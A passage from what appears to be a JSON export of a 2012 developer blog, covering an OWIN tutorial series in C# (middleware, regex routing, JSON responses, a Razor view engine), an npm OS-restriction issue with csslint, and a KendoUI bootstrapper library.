I’m also wanting support a “layout” view so that you can do reusable HTML; it just makes sense.\nSince you’re now able to specify the Views folder I’ll add another extension method so you can provide that instead of using the default way:\npublic static IAppBuilder UseViewEngine<TViewEngine>(this IAppBuilder builder, TViewEngine viewEngine) where TViewEngine: RazorViewEngine { ViewEngineActivator.ViewEngine = viewEngine; } This also means that you could super-class the RazorViewEngine if you want and provide additional functionality.\nNext up we’ll start implementing our Parse<T> method.\npublic string Parse<T>(string viewName, T model) { viewName = viewName.ToLower(); if (!viewCache.ContainsKey(viewName)) { var layout = FindView(LayoutViewName); var view = FindView(viewName); if (!view.Exists) throw new FileNotFoundException("No view with the name '" + view + "' was found in the views folder (" + ViewFolder + ").\\r\\nEnsure that you have a file with that name and an extension of either cshtml or vbhtml"); var content = File.ReadAllText(view.FullName); if (layout.Exists) content = File.ReadAllText(layout.FullName).Replace("@Body", content); viewCache[viewName] = content; } return Razor.Parse(viewCache[viewName], model); } What you’ll see here is I’m creating a cache of views that get discovered for performance so it’s all shoved into a static dictionary that I’ve got*. Assuming that this is the first time we’ll look for the layout view and current view, raise an error if the view isn’t found, and then combine them all together.\n*This is pretty hacky code and doesn’t take concurrency into account; make sure you do double-lock checking!\nOne convention I’m adding myself is that the “body” (aka, the current view) will be rendered where ever you place an @Body directive. This is because we’re using Razor the language which is slightly different to MVC’s Razor. The language doesn’t include the RenderBody method, that’s specific for the implementation. When creating your own view engine though you’re at liberty to do this how ever you want. You could alternatively create your own base class that handles the body better, me, I’m lazy and want a quick demo.\nI finish off caching the generated template so that next time we can skip a bunch of the lookup steps and then get RazorEngine to parse the template and send back the HTML*.\n*I’m not sure if this is the best way to do it with RazorEngine, I think you can do it better for caching but meh. Also, you don’t have to return HTML, you could use this engine to output any angled-bracket content.\nUsing our View EngineNow that we have our View Engine written we need to work out how we’ll actually use it. Like we did in the last post I’m going to use extension methods on the Response object to provide the functionality:\npublic static void View(this Response res, string view) { var output = ViewEngineActivator.ViewEngine.Parse(view); res.ContentType = "text/html"; res.Status = "200 OK"; res.End(output); } public static void View<T>(this Response res, string view, T model) { var output = ViewEngineActivator.ViewEngine.Parse(view, model); res.ContentType = "text/html"; res.Status = "200 OK"; res.End(output); } This is pretty simple, we’re really just acting as a bridge between the response and the view engine. 
Sure I’m also making the assumption that it’s text/html that we’re returning despite saying above we can do any angled-bracket response, changing that can be your exercise dear reader.\nBringing it all togetherSo we’ve got everything written let’s start using it:\nbuilder .UseViewEngine<RazorViewEngine>() .Get("/razor/basic", (req, res) => { res.View("Basic"); }); Pretty simple to use our View Engine now isn’t it!\nConclusionIn this post we’ve had a look at what it’d take to produce a basic View Engine on top of OWIN, building on top of the knowledge and concepts of the last few posts.\nIn the next post I’m going to take the idea of a View Engine one step further and give the user a lot more power.\nAs always you can check out the full code up on the GitHub repository.\n", "id": "2012-03-23-owin-view-engines" }, { "title": "Watch your OS", "url": "https://www.aaron-powell.com/posts/2012-03-21-watch-your-os/", "date": "Wed, 21 Mar 2012 00:00:00 +0000", "tags": [ "nodejs", "npm" ], "description": "Today we got caught out by a recent npm change", "content": "Today some of my colleagues were trying to integrate csslint into the build process of a project using the nodejs package but they kept hitting an issue:\nnpm ERR! Unsupported npm ERR! Not compatible with your operating system or architecture: csslint@0.9.7 npm ERR! Valid OS: darwin,linux npm ERR! Valid Arch: any npm ERR! Actual OS: win32 npm ERR! Actual Arch: ia32 So I had a crack on my machine and it worked just fine. This was rather confusing until we compared versions. I was running version 0.6.11 where as they were running 0.6.13. This didn’t make sense, why could I install it but they couldn’t?\nI put on my detective hat and went hunting, the first thing I found was that there is an OS restriction in the package.json file:\n"os": ["darwin", "linux"], This doesn’t include windows anywhere, but it also doesn’t explain why it worked on my Win7 x64 install but not theirs.\nThen I went back and checked out what changed between the two versions of Node.js, in particular what changed with npm.\nThat’s when I came across the release notes for 0.7.6. While true this is for the 0.7.* unstable branch and we’re using the 0.6.* stable what’s worth noting is the first change for npm version 1.1.8:\nAdd support for os/cpu fields in package.json (Adam Blackburn)\nI then looked at the 0.6.13 release, it’s using npm 1.1.9. Compare that to 0.6.11 which used npm 1.1.1 and I think we’ve found our issue. In the change between the two Node versions we’ve got a new npm version which supports something that wasn’t supported before!\nA simple fork and pull request and the problem is solved and now we have to wait for the next version for csslint to be published.\nLesson Learntnpm now supports the OS (and CPU) package.json property from CommonJS so make sure you check that properly!\n", "id": "2012-03-21-watch-your-os" }, { "title": "OWIN Responses", "url": "https://www.aaron-powell.com/posts/2012-03-19-owin-responses/", "date": "Mon, 19 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "A look at how to give power to our responses by making different response types easier to handle", "content": "In the last post we looked at Routing in OWIN as we built up a simple little route engine. 
Today I want to look at how to bring power to our responses by making it easier to respond with different types.\nIn ASP.Net MVC you're probably used to writing code like this:\npublic ActionResult Index() { return Json(new { FirstName = "Aaron", LastName = "Powell" }); } Here our Action (which comes from our Route) is defining that we want to output JSON to the response, and it gives us a nice way in which we can do it. Let's see about adding something similar to our application.\nResponding with JSON\nWe'll start with an easy task, we'll make it easier to respond with JSON. To do this there's two things which we need to do:\nEnsure the appropriate content type is set on the response\nPut a value into the response that is valid JSON\nWith those two requirements in mind we need to think about just how we want the API to work. Do we want an extension method on the IAppBuilder interface? If so how do we handle different request types, are we going to have a lot of boilerplate code to cover all that? Or maybe we should go with the Nancy approach and have a return value from our delegate. At the moment our delegate just executes some code; well maybe we could have it return instead. This would be advantageous as it would be somewhat familiar to MVC developers.\nBut neither of these options is really ideal in my opinion as they require a lot of code to make them work. We'd be constantly writing extension methods to handle this and when we get to another type (say XML) we'd either have to create yet another extension method or ensure we have a viable base type that we can return (which is what ActionResult does for MVC). Admittedly this may be a symptom of our design thus far, but keep in mind that this is more about exploring the various concepts without adding huge amounts of overhead.\nSo this leaves us with one final option: augment the Response object to have these methods on it. This is the approach I want to go with as it feels cleaner (and it's more familiar to me coming from Express.js). Rather than super-classing the Response object which we already have (like we did with the Request object) I'm going to stick with good ol' fashioned extension methods. This makes it much easier to include the methods and also avoids having to change our delegate signatures (like we did when we introduced RoutedRequest), so we'll spin up a new class:\npublic static class RouteExtensions { public static void Json(this Response res, dynamic obj, bool useJavaScriptNaming = true) { throw new NotImplementedException(); } } This is the basis for our extension method; I'm taking in two arguments, one of which is optional. The main argument, obj, will represent the value which we want to serialize and send down to the client. I'm also having an optional boolean argument (defaulted to true) which will indicate whether we want to use JavaScript naming conventions (more on that in a second).\nFor the serialization we're going to be using the JSON.Net serializer as it really is awesome.\nThe first things we want to do in our extension method are setting the content type and status code (since we can assume here that it'll be successful by this being called; you could pass in the status code if you wanted but for simplicity's sake we'll hard code it):\npublic static void Json(this Response res, dynamic obj, bool useJavaScriptNaming = true) { res.ContentType = "application/json"; res.Status = "200 OK"; throw new NotImplementedException(); } Lovely, now to think about serialization. 
As I said I’m going to use JSON.Net and the reason I’m having the optional boolean argument is because .NET naming conventions are different to JavaScript (.NET uses PascalCase where as JavaScript is all about camelCase) so I want to force the conversion myself but allow people to opt-out of it if they want (which is something we’ve needed on the project I’m on at the moment). Luckily JSON.Net allows us to do this very easily:\npublic static void Json(this Response res, dynamic obj, bool useJavaScriptNaming = true) { res.ContentType = "application/json"; res.Status = "200 OK"; var serializer = new JsonSerializer(); if (useJavaScriptNaming) serializer.ContractResolver = new CamelCasePropertyNamesContractResolver(); res.End(JObject.FromObject(obj, serializer).ToString()); } See, quite easy. We start by creating a serializer, check the boolean argument and add a contract resolver of CamelCasePropertyNamesContractResolver if we want to do JavaScript naming and finish off by ending the response with a serialized object.\nThere may be an easier way to do this, I’m hardly a JSON.Net expert this is just the way I’ve come across doing it and it works fine for my needs.\nSending out JSONOnce importing the namespace for our extension methods we can get cracking on using it:\nbuilder.Get("/json", (req, res) => { res.Json(new { FirstName = "Aaron", LastName = "Powell" }); }); Yeah it’s just that simple! And since this is all within the scope of the request you can access any of the properties you have on your request (such as your named arguments) and work them into the response:\nbuilder.Get("/json/:name", (req, res) => { res.Json(new { Name = req.UrlSegments.name }); }); ConclusionSo this wraps up a quick look at how we can start enriching our responses by adding different response types. Using the method described above you could easily create methods to return text, XML, or even a VCard, basically anything you want from your application.\nIt’s all starting to come together nicely but there’s something quite important missing… HTML. In our next instalment we’ll look at producing a View Engine to respond with HTML.\nAs always you can check out the full code up on the GitHub repository.\n", "id": "2012-03-19-owin-responses" }, { "title": "OWIN routing", "url": "https://www.aaron-powell.com/posts/2012-03-16-owin-routing/", "date": "Fri, 16 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "Now it's time to do some routing on top of OWIN", "content": "Last time around we started looking at middleware in OWIN and how to handle different request types. So now comes the next logical step, how do we handle different URLs? Currently we don’t have the facilities to handle different URLs, aka routing, so let’s work on that.\nUnderstanding routing Before we dive into coding our solution it’s a good idea to think about what routing really is. You’re probably familiar with this from ASP.Net MVC with code such as:\nroutes.MapRoute( "Default", // Route name "{controller}/{action}/{id}", // URL with parameters new { controller = "Home", action = "Index", id = "" } // Parameter defaults ); What’s really important is line three, where we are defining what the URL we are going to be targeting looks like. With MVC routing we do a few other things such naming the route and providing default values for the segments of the URL that we’re trying to match but that’s not really of interest to us. 
If we think about the kinds of URLs we're going to be constructing we can break it down as:\nThere'll probably be something static in the URL\nTo retrieve records we'll probably have some kind of pattern to match\nSome URL segments may be useful in the handler\nOk, now that we understand a bit about how we want to construct our route matching, let's set about implementing it. To do this we're going to build on top of the extension methods we built last time, but for this we're going to need to be passing in a URL, well, a pattern to match the URLs.\nDefining our route matching\nThe first thing we'll do is look at the routing systems in other middleware projects like Nancy, Express.js on Node and Sinatra on Ruby. Something that we can see from these three projects (and other middleware projects out there) is that they support the URL matching scenarios I described above (coincidence?) and they do it in similar ways. All allow you to do:\nA static value\nA named value This is slightly different in Nancy to the other two, Nancy uses {name} to define a named value whereas the others use :name\nA pattern-matched value\nFor this example I'm going to use the Sinatra/Express.js routing style (:name not {name}).\nBreaking down our route matching\nSo now that we know what we want to be able to do in our URLs let's think about how we'd do it.\nStatic values should be pretty easy, it's just a string that we want to match against and equality statements should be right to take care of that, let's move on.\nNamed values are next on the list; what we want to do here is take this particular URL segment and then grab the value to provide to our handler, maybe we can get away with just sub-stringing here?\nPattern matching… hmm that's an interesting one, but you know what, it's not really that hard, there's a very simple way to do pattern matching… Regex!\nRegex ALL the things! Let's say we want this URL to match:\n/users/1234/unsubscribe/email@mail.com The URL has two static sections to it, /users/ and /unsubscribe/, and it also has two dynamic sections, something that we can assume is an id and an email address. Both of these segments are likely to be useful within our handler so we'd want to be able to capture them. And if we think about the id segment it's likely we have some kind of a pattern that could represent it, and for the email we just want to capture it (although it's true we could also put a pattern in place to match the email, email matching is complex so I don't want to match it in our URL, that's for the business logic to validate).\nNow let's look at a pattern for the URL to meet our requirements:\n/users/(?<id>\\d{1,5})/unsubscribe/:email Alright that's looking good, we've got a regex to restrict our id to what we know it to be in our system and we've said we want to capture the email, but how would we actually match that URL? The answer… regex the whole URL (regardless of whether I now have two problems)! The reason I want to regex the URL is that otherwise we have to do a bunch of string splitting, manipulation and guff code just to match all the segments, which is really what we are doing in a Regex itself.\nSo I'm going to start with a new extension methods class called Routing and we'll focus on processing GET requests (and can refactor later for the other verbs). 
Inside this class I’m going to create a private method to break down our URL pattern into something that’ll actually match:\nprivate static Regex RouteToRegex(string route) { throw new NotImplementedException(); } The first thing I want to do is split out each segment of the URL:\nprivate static Regex RouteToRegex(string route) { var parts = route.Split(new[] { "/" }, StringSplitOptions.RemoveEmptyEntries).AsEnumerable(); throw new NotImplementedException(); } This gives us an array like so:\nparts[0] == "users" parts[1] == "(?<id>\\d{1,5})" parts[2] == "unsubscribe" parts[3] == ":email" Well then, three out of those four parts look like regexs already, want to match the work users, well users will do that. Want to capture a number one to five characters in length, well we’ve got a named capture group for that too. The only thing that doesn’t look like a regex is :email, but is something that looks unique and we could match against.\nNow we need to go through the array and find any of these :email-esq values and turn them into named catch-all groups as that’s what we want to do. Again, regex comes to the rescue, and with this I’m going to some LINQ trickery:\nprivate static readonly Regex paramRegex = new Regex(@":(?<name>[A-Za-z0-9_]*)", RegexOptions.Compiled); private static Regex RouteToRegex(string route) { var parts = route.Split(new[] { "/" }, StringSplitOptions.RemoveEmptyEntries).AsEnumerable(); parts = parts.Select(part => !paramRegex.IsMatch(part) ? part : string.Join("", paramRegex.Matches(part) .Cast<Match>() .Where(match => match.Success) .Select(match => string.Format( "(?<{0}>.+?)", match.Groups["name"].Value.Replace(".", @"\\.") ) ) ) ); throw new NotImplementedException(); } First off I’ve created a regex to match our catch-all which resides in the static field. Next I’m going to go through each of the URL segments and if they aren’t a match to the pattern then they are already regexable and we’ll just return them, otherwise we’ll get all the matches and then them into the named catch-all capture group. Our array will then look like this:\nparts[0] == "users" parts[1] == "(?<id>\\d{1,5})" parts[2] == "unsubscribe" parts[3] == "(?<email>.+?)" Lastly we’ll rejoin all the regex parts with / separators so that it is back to being a URL as well as put start and end terminators (we’ll also make it case-insensitive and compile the regex for speed):\nprivate static Regex RouteToRegex(string route) { var parts = route.Split(new[] { "/" }, StringSplitOptions.RemoveEmptyEntries).AsEnumerable(); parts = parts.Select(part => !paramRegex.IsMatch(part) ? part : string.Join("", paramRegex.Matches(part) .Cast<Match>() .Where(match => match.Success) .Select(match => string.Format( "(?<{0}>.+?)", match.Groups["name"].Value.Replace(".", @"\\.") ) ) ) ); return new Regex("^/" + string.Join("/", parts) + "$", RegexOptions.Compiled | RegexOptions.IgnoreCase); } Ta-Da! We now have a matching algorithm like so:\n^/users/(?<id>\\d{1,5})/unsubscribe/(?<email>.+?)$ Paste that into your favourite regex tester and take it for a whirl!\nMatching our routeNow that we can match our route maybe we should expose that. 
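If you'd rather check that in code than in a regex tester, a quick throwaway test does the job (this assumes RouteToRegex is made visible to your test code, since it's private above):

```csharp
// sanity check the generated pattern against the example URL
var regex = RouteToRegex("/users/(?<id>\\d{1,5})/unsubscribe/:email");
var match = regex.Match("/users/1234/unsubscribe/email@mail.com");

Console.WriteLine(match.Success);               // True
Console.WriteLine(match.Groups["id"].Value);    // 1234
Console.WriteLine(match.Groups["email"].Value); // email@mail.com
```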
As I said we’ll create an extension method that allows us to do this:\npublic static IAppBuilder Get(this IAppBuilder builder, string route, Action<Request, Response> app) { throw new NotImplementedException(); } This looks like the one from the last post but we’re taking in a route as the first argument, meaning we can do:\nbuilder.Get(@"/users/(?<id>\\d{1,5})/unsubscribe/:email", (req, res) => { res.ContentType = "text/plain"; res.End("Unsibscribed\\r\\b"); }); The logic of this method isn’t going to be much different to the ones from the last post with the addition of doing a match against our regex:\npublic static IAppBuilder Get(this IAppBuilder builder, string route, Action<Request, Response> app) { var regex = RouteToRegex(route); return builder.Use<AppDelegate>(next => (env, result, fault) => { var path = (string)env["owin.RequestPath"]; if (path.EndsWith("/")) { path = path.TrimEnd('/'); } if ((string)env["owin.RequestMethod"] == "GET" && regex.IsMatch(path)) { var req = new Request(env); var res = new Response(result); app(req, res); } else { next(env, result, fault); } }); } So up front we create our regex and then inside the handler we will match against it as well as checking the Request verb. You’ll see that we’re getting the URL (path) out, again this comes from the OWIN Environment Variables. The only other thing we’re doing is stripping the trailing /. This is more personal preference (and I’m sure some SEO expert can give a good reason for it) but you don’t have to remove it if you don’t want, you’d just have to ensure the regex can handle that scenario.\nBut now we’re able to filter the requests by URL and it’s all going to track nicely for us!\nCapturing our URL segmentsAs I said earlier in the post generally when we have a specific URL segment to match we do that because we care about the value and we’ll be wanting it in our handler. Currently though we’re not passing that in are we? Well we should solve that! At the moment I’m using the Gate Request object for the handler but it wont really do what I want here, at least not in an overly discoverable way (since it inherits from a Dictionary<string, object> it’s not too hard but I want to make it easier). Instead I want to extend it, so I’m going to create a superclass called RoutedRequest.\nIn the RoutedRequest class I want to surface any of the matched segments and to do this I’m going to use a helper class I wrote a while ago for using Dynamics and pass in a dictionary that represents all matched values. This makes our RoutedRequest class nice and simple:\npublic class RoutedRequest : Request { public RoutedRequest(IDictionary<string, object> env, Regex regex, string path): base(env) { var groups = regex.Match(path).Groups; var dic = regex.GetGroupNames().ToDictionary(name => name, name => groups[name].Value); UrlSegments = new DynamicDictionary<string>(dic); } public dynamic UrlSegments { get; private set; } } Now once we update the Get method we can update our handler like this:\nbuilder .Get(@"/users/(?<id>\\d{1,5})/subscribed/:email", (req, res) => { res.ContentType = "text/plain"; res.End("Email " + req.UrlSegments.email + " is subscribed.\\r\\n"); }); You’ll notice that off the req object we can go through the UrlSegments property and use dot-notation to access the email address that was submitted. This is pretty sexy if I do say so myself.\nConclusionI’ll admit that this was quite a long post as the subject of routing is a complex one. 
Hopefully though you’ve seen that without a lot of code we’ve made a phenomenally powerful little route engine (really, it’s quite a simple bit of code in the end).\nWhile the route that we’ve been looking at is rather complex our little engine is capable of pretty much anything, we don’t need to be putting in regexs, we can get away with routes like /home or /about as well.\nNext time we’ll look at how we can make our responses more powerful with simple helper methods.\nAs always you can check out the full code up on the GitHub repository.\n", "id": "2012-03-16-owin-routing" }, { "title": "OWIN and Middleware", "url": "https://www.aaron-powell.com/posts/2012-03-15-owin-and-middleware/", "date": "Thu, 15 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "", "content": "In my last post I looked at getting started with the basics of OWIN and how to create a server which wont do anything overly useful. In this post I want to go a step further and look at how we can start introducing our own layers on top of OWIN (and Gate) to make it nicer to do like web stuff.\nIt’s all about the modulesOne of the aims of OWIN is to be very lightweight and as we saw in the last post OWIN itself doesn’t really have anything in it and it doesn’t really do anything. This means that you’re entirely responsible for what you do and don’t have included in your server. What this means is that OWIN is very modular, it’s a mix-and-match of what you want to include in your project and if you don’t want something then don’t include the assembly, but it also means that you often have to do something yourself, and this is done through modules.\nMiddlewareIn comes the concept of Middleware; now this isn’t a new concept in software but it’s probably foreign to most .NET developers, particularly ASP.Net as we’ve always had it built in and never needed to think about it. But with OWIN it’s not so, you’ve kind of got to start from scratch.\nNow this isn’t entirely true, there’s already OWIN middleware out there like Nancy, Kayak and Gate.Middleware to name a few, but I want to introduce the concept and what to do to make a basic middleware. Really you want to be looking at existing libraries to give you what you need.\nBack in the last example we had a single method that was handling all the requests that were coming in, be they to / or /favicon.ico, a HTTP GET or POST, everything was handed to this one method. But this isn’t really ideal now is it? You can’t really expect an application to be run out of a single delegate now can you? Let’s start with a simple handler.\nHandling different verbsI want to start by making it easy to filter requests by the HTTP verb used, so I can have different handlers for GET, POST, PUT, etc. This is a pretty common scenario we’d want to handle if we’re building a RESTful service so let’s get started.\nTo implement this I want to extend the IAppBuilder interface that we came across in our last post through the use of extension methods and I’m also going to build on top of Gate for simplicities sake. So I’ll start with crating our class:\npublic static class Middleware { public static IAppBuilder Get(this IAppBuilder builder, /* todo - something goes there */) { throw new NotImplementedException(); } } So this is our extension method, we’re going to extend IAppBuilder but what will the argument(s) be that we’re passing in? 
Well we’re going to want something to execute, we’re going to want a delegate, and since I want the consumer of my API to be able to get pretty good control over what’s happening I’ll pass in a Request and Response object which come from Gate:\npublic static class Middleware { public static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { throw new NotImplementedException(); } } This allows me to consume the API like so:\nbuilder.Get((req, res) => { res.Status = "200 OK"; res.ContentType = "text/plain" res.Write("Hello World!\\r\\b").End(); }); But what does the implementation look like? It’s all well and good to have an API but if all it does is throw a NotImplementedException it’s kind of a shitty API…\nSo inside out Get method we need to ensure that we’re only invoking the delegate provided when it’s correct to do so, aka, when the request has come in as a HTTP GET.\nThe OWIN specification is nice enough to tell us what is happening in the request as it’s coming in through the use of a few environment variables it defines, the one of interest to us is owin.RequestMethod. From here we can work out if we actually have to do something with the request or hand it off to something else.\nThe crux of what we’re going to be coding will sit on top of the IAppBuilder.Use<TApp> method, and we’ll also return this to allow for method chaining (since Use returns an IAppBuilder) and it’ll look like so:\npublic static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { return builder.Use<AppDelegate>(next => (env, result, fault) => { throw new NotImplementedException(); }); } The generic type we’re going to be specifying is that of AppDelegate which defines a few basic arguments (read the spec!)and ultimately allows us to do some processing. The first step of which we want to check the HTTP Verb that has come in:\npublic static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { return builder.Use<AppDelegate>(next => (env, result, fault) => { if ((string)env["owin.RequestMethod"] == "GET") { // yay } else { // nay } }); } That’s pretty simple isn’t it, a request comes it, it gets handed to our delegate, we run a condition against and and if it matches we want to then pass that along to the handler that our API consumer provided us:\npublic static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { return builder.Use<AppDelegate>(next => (env, result, fault) => { if ((string)env["owin.RequestMethod"] == "GET") { var req = new Request(env); var res = new Response(result); app(req, res); } else { // nay } }); } When we match our verb we’re creating a Request and Response object (these are helpers from Gate) which the handler can then manipulate. The handler is invoked (it’s the app variable) and our processing is on its way.\nBut what do we do if it’s not a GET request? Welcome to the world of delegates. You’ll notice that there was a next variable defined to represent the AppDelegate, well we haven’t used it yet, but that’s what comes into play now when you don’t want to handle the current request (or can’t), we hand it off to someone else then it’s their damn problem.\npublic static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { return builder.Use<AppDelegate>(next => (env, result, fault) => { if ((string)env["owin.RequestMethod"] == "GET") { var req = new Request(env); var res = new Response(result); app(req, res); } else { next(env, result, fault); } }); } Ta-Da! 
We’ve got our handler that will:\nTake a delegate of something to execute when we’ve got a request When a request comes in it’ll check if matches our desired verb If it’s a matched verb then we’ll hand it to our delegate Otherwise give it back to your server for someone else to deal with it You can then go and create extensions for all the verbs you want supported as well.\nConclusionIn this post we’ve had a bit of a look at what to do to make it a bit easier to work with OWIN by starting our own layer of middleware. We created a little middleware helper to give us easy methods to provide delegates for the different HTTP verbs and hopefully given you a starting point for where you could build out other middleware features.\nNext time we’ll look at what you need to do to have routing included in your application.\nI’ve decided to create a GitHub repository which you can see the code and follow the progress of these blog posts.\n", "id": "2012-03-15-owin-and-middleware" }, { "title": "Hello OWIN", "url": "https://www.aaron-powell.com/posts/2012-03-14-hello-owin/", "date": "Wed, 14 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "An introduction to OWIN and building a server.", "content": "Long time readers of my blog will probably be aware that I’ve become quite a fan of Node.js. One of the things that I’ve liked about working with it is that it’s very bare bones so you’re working very closely with the HTTP pipeline, something that you don’t do with ASP.Net (WebForms in particular, MVC is much closer but still a reasonable abstraction).\nAbout 18 months ago a .NET project popped up on the radar though, a project called OWIN. OWIN isn’t really a coding project though, it’s a specification that defines how web applications and .NET web servers should communicate with each other. The nice thing about this is that is is really bare bones, like with Node.js OWIN defines a very thin layer on top of HTTP which can be very powerful.\nHello OWINSo you’ve decided you want to get started with OWIN, well where do you start?\nAs I mentioned about OWIN is really just a specification and if you read the About page it states:\nOWIN defines a single anonymous delegate signature, and therefore introduces no dependencies; there is no OWIN source code.\nThat means that you don’t actually build against OWIN*, you want to look at some of the modules built on top of it.\n*Note this isn’t entirely true, you can build against the OWIN NuGet package but it’s painfully difficult to anything :P. Check out this for an example of a Hello World on just OWIN.\nInstead you probably want to have a look at Gate, which is a set of helpers that sits on top of OWIN and makes it a bunch nicer to work with and it’s what I’m going to use in this example.\nThe first thing I wanted to do was replicate the Node.js demo of creating a basic Hello World server:\nvar http = require('http'); http.createServer(function (req, res) { res.writeHead(200, {'Content-Type': 'text/plain'}); res.end('Hello World\\n'); }).listen(1337, '127.0.0.1'); console.log('Server running at http://127.0.0.1:1337/'); So if this is our goal how do we go about it with OWIN and Gate?\nProject Setup Since there’s no Gate project template (that I’ve found) we’ll start with just a C# Class Library project. 
To this you’ll want to add a dependency on Gate (and that’ll include OWIN) and we’re ready to go.\nMost OWIN hosts (we’ll talk about that in a minute) use a convention that to run there needs to be a public class named Startup in the root namespace of the assembly you’re running, so we’ll make one:\npublic class Startup { public static void Configuration(IAppBuilder builder) { } } Inside our Startup class we’ve got a Configuration method (taking IAppBuilder which comes from OWIN). This method is where we will define how to handle the requests that are coming in, basically where we define our Hello World.\nCreating a configuration I’m going to use the RunDirect extension method (which resides in the Gate namespace) as it’s as close as we get to the above Node.js function structure, and it looks like this:\npublic static void Configuration(IAppBuilder builder) { builder .RunDirect((req, res) => { res.Status = "200 OK"; res.ContentType = "text/plain"; res.Write("Hello World!\\r\\n") .End(); }); } The code should be fairly easy to understand, we get two inputs and Request object and a Response object. These come from Gate (and this is why I recommend Gate over raw OWIN) and are really just dictionaries with a couple of helpful properties and methods for doings the simple stuff you’d want to be doing.\nHosting our application If you’re still following along you’ll remember me saying that OWIN is really just a specification, it defines what the communication interfaces look like but it doesn’t define how they should work, for that you’re going to need an OWIN host. The ideal way to do this is through ghost. Ghost is just an executable that you can run against a class library and spin up your project. Unfortunately I’ve been having problems running ghost so rather than looking at producing something that requires hosting we can look at making our application self hosting. For this I’m going to use Firefly as it’s a nice and simple host for OWIN applications, so go and install it from NuGet.\nNow we’ve got the dependency on Firefly we need to make an executable rather than a class library. Start by adding a Program class and a Main method like so:\nclass Program { static void Main(string[] args) { } } Then you can go into your project properties and change the output type to a Console Application and set the appropriate startup object. All easier than creating a new project I think ;).\nI’m also going to add a dependency on Gate.Builder which is another utility library that takes away some of the grunt work for setting up your application host. With this we’re going to do 3 things:\nCreate builder for our application (an implementation of IAppBuilder) Create a Firefly server Provide Firefly with our application This is what our Main method will now look like:\nstatic void Main(string[] args) { var builder = new AppBuilder(); //Tell the builder to use our configuration var app = builder.Build(Startup.Configuration); //Start up the server on port 1337 var server = new ServerFactory().Create(app, 1337); Console.WriteLine("Server running at http://127.0.0.1:1337/"); //Stay running! 
Console.ReadKey(); } ConclusionThere we go hit F5 and your app will be running, just the same as our initial Node.js example and the full code can be found here.\nIt turns out that this isn’t overly difficult to do, the trick is finding the various dependencies that you require, remember I use:\nGate Gate.Builder Firefly In the next post we’ll look at how to handle requests in a better fashion with a basic middleware implementation.\n", "id": "2012-03-14-hello-owin" }, { "title": "How to explain where to put your JavaScript in a page", "url": "https://www.aaron-powell.com/posts/2012-02-21-scripts-are-blocking/", "date": "Tue, 21 Feb 2012 00:00:00 +0000", "tags": [ "javascript", "just-for-fun" ], "description": "", "content": "I decided that I’m tired of explaining why you should do JavaScript combination and avoid inline scripts.\nSo here’s a comic that should explain it.\nClick for a larger version.\n", "id": "2012-02-21-scripts-are-blocking" }, { "title": "KendoUI Bootstrapper", "url": "https://www.aaron-powell.com/posts/2012-02-16-kendo-ui-bootstrapper/", "date": "Thu, 16 Feb 2012 00:00:00 +0000", "tags": [ "javascript", "kendoui" ], "description": "", "content": "For my Stats It project I’m using KendoUI as my UI widget layer (and charting) as it has several more UI widgets that I’m looking for than jQuery UI offers. But there’s one thing I hate having to do, and that’s constantly write code like this:\n$('.datePicker').kendoDatePicker(); This goes for all libraries I’ve used, you’re constantly having to bootstrap the UI widgets so that they appear. Now there’s a good reason for this, so you can pass in options, etc to setup your controls for their actual use, but I find that you end up with a lot of boilerplate code around that is doing the same thing each time and when trying to be DRY this is annoying.\nIntroducing KendoUI BootstrapperIn an effort to address the lack of DRYness in my projects I started a new library which is up on github called KendoUI Bootstrapper with the goal of solving this problem for me.\nBasically what this library does is automatically creates your KendoUI widgets for you and then exposes them out in an API so you can interact with them. 
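To give a rough feel for the difference (jumping ahead a little, and using the same date picker input that shows up in the example further down):

```js
// without the bootstrapper: configuration goes into each constructor call
$('#startDate').kendoDatePicker({ max: new Date() });

// with the bootstrapper: the widget is created for you from the markup,
// then you configure it through its API
window.kendo.bootstrap();
window.kendo.datePickers.startDate.max(new Date());
```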
This means that if you want to do anything “custom” to a widget (say set a min/max for a date picker) you use the widget API to do it, rather than passing it in as a setting to the constructor.\nUsing KendoUI BootstrapperSay you’ve got some date pickers that you want to use; to do so you’d have something like this in your HTML:\n<input id="startDate" /> <input id="endDate" /> Then to get the bootstrapper to work you need to add a data-* attribute, in the form of data-kendo="<widget type>", so for the date pickers we now have this in our HTML:\n<input id="startDate" data-kendo="date" /> <input id="endDate" data-kendo="date" /> Next you need to add a reference to the Bootstrapper JavaScript file and tell it to do its thing:\nwindow.kendo.bootstrap(); The bootstrapper will augment the window.kendo object by adding a datePickers property which will have two properties of its own, one called startDate and one called endDate.\nThis kind of thing I would put in my master JavaScript file for the page so that all my widgets are set up initially for me, but in the page JavaScript that is responsible for my date range picker I would have something like this:\nvar start = window.kendo.datePickers.startDate, end = window.kendo.datePickers.endDate; var startChange = function () { var startDate = start.value(); if (startDate) { startDate = new Date(startDate); startDate.setDate(startDate.getDate() + 1); end.min(startDate); } }; var endChange = function () { var endDate = end.value(); if (endDate) { endDate = new Date(endDate); endDate.setDate(endDate.getDate() - 1); start.max(endDate); } }; start.bind('change', startChange); end.bind('change', endChange); start.max(end.value()); end.min(start.value()); end.max(new Date()); Here I’ve implemented the same code that can be found in the KendoUI demos, but rather than performing some setup as part of the “constructor” for the date picker and then using the API, I’m doing everything through the API. I find this preferable as it means I have a separation of concerns: I know that in my JavaScript file I have two objects that represent what could be a date picker without having to dive into the HTML, it’s just a programming API. This means I can stub them out and write some tests against them, testing pure logic rather than testing against the DOM.\nLimitations At the moment this project is under development and I’m really developing it on an as-needed basis, ie - if I haven’t used the widget it’s not going to be there :P. But if you want to add features then send me a pull request!\nObviously this doesn’t cater for 100% of scenarios; there will be scenarios in which this won’t work, and if that’s the case don’t put a data-kendo attribute on your element and wire it up yourself.\nI’ve also been told by some of the people at Telerik that there may be some problems with APIs not working as expected in KendoUI itself. If that’s the case this is a good test bed to have them find these problems and fix them, so I see this as more of an opportunity to help the KendoUI team to have as good an API as possible.\n", "id": "2012-02-16-kendo-ui-bootstrapper" }, { "title": "Macros in packages", "url": 